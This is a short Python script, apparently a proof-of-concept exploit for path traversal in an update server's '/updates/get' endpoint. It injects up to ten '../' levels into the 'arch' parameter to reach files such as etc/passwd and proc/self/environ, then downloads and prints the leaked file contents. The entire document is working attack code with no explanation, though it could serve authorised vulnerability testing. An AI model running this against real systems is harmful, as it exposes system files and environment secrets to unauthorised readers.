import sys
import json
from urllib.request import urlopen
from urllib.parse import urlencode
from urllib.error import URLError

u = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
u = u.rstrip("/")
t = ["etc/hostname", "etc/passwd", "proc/1/cmdline", "proc/self/environ", "proc/cpuinfo"]

for d in range(1, 11):
    up = "/".join([".."] * d)
    for f in t:
        a = f"{up}/{f}"
        params = urlencode({
            "platform": "android",
            "arch": a,
            "app": "1.0.0",
            "kernel": "0.0.0"
        })
        try:
            r = urlopen(f"{u}/updates/get?{params}", timeout=5)
            data = json.loads(r.read())
        except (URLError, ValueError):
            continue

        k = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
        kurl = data.get("kernelUrl") or data.get("kernel_url")
        if k and kurl and ".." in kurl:
            print(f"Found: {kurl}")
            try:
                c = urlopen(u + kurl, timeout=5).read().decode("utf-8", errors="replace")
                print(c[:1000])
            except URLError:
                print("Download failed")
            sys.exit(0)

print("Not vulnerable")
sys.exit(1)